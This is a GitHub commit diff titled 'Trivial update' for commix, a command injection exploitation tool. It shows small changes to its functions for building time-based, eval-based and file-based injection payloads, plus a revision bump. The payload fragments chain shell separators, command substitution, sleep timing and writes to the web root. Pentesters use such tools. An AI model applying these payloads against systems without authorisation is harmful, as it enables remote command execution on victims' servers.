Trivial update

commixproject · Jan 31, 2025 · 4117ade · 4117ade
1 parent 7f2a0dd
commit 4117ade
Show file tree

Hide file tree

Showing 5 changed files with 8 additions and 5 deletions.
diff --git a/src/core/injections/blind/techniques/time_based/tb_payloads.py b/src/core/injections/blind/techniques/time_based/tb_payloads.py
@@ -244,6 +244,7 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque
                 "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
                 )
   else:
+    settings.USER_APPLIED_CMD = cmd
     if separator == ";" or separator == "%0a":
       payload = (separator +
                  # Find the length of the output, using readline().
@@ -385,6 +386,7 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http
                 "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
                 )
   else:
+    settings.USER_APPLIED_CMD = cmd
     if separator == ";" or separator == "%0a":
       payload = (separator +
                  "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator +

diff --git a/src/core/injections/results_based/techniques/eval_based/eb_payloads.py b/src/core/injections/results_based/techniques/eval_based/eb_payloads.py
@@ -222,6 +222,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
                     separator + "echo '" + TAG + "'`)%3B"
                   )
   else:
+    settings.USER_APPLIED_CMD = cmd
     if separator == "":
       payload = ("print(`echo " + TAG + "`." +
                   "`echo " + TAG + "`." +

diff --git a/src/core/injections/semiblind/techniques/file_based/fb_payloads.py b/src/core/injections/semiblind/techniques/file_based/fb_payloads.py
@@ -71,7 +71,6 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
 Execute shell commands on vulnerable host.
 """
 def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
-
   if settings.TFB_DECIMAL == True:
     payload = (separator + cmd)
 
@@ -87,7 +86,6 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
     payload = (separator +
               cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
               )
-
   return payload
 
 """
@@ -106,9 +104,11 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE):
                 "') do @set /p = %i " + settings.CMD_NUL
                 )
   else:
+    settings.USER_APPLIED_CMD = cmd
+    cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX
     payload = (separator +
               settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + 
-              settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
+              settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
               )
 
   # New line fixation

diff --git a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py
@@ -205,7 +205,6 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth
 
   else:
     settings.USER_APPLIED_CMD = cmd
-
     if separator == ";"  or separator == "%0a" :
       payload = (separator +
                 "str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator +
@@ -289,6 +288,7 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_
                 "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
                 )
   else:
+    settings.USER_APPLIED_CMD = cmd
     if separator == ";"  or separator == "%0a" :
       payload = (separator +
                 settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator +

diff --git a/src/utils/settings.py b/src/utils/settings.py
@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.1"
-REVISION = "7"
+REVISION = "8"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE: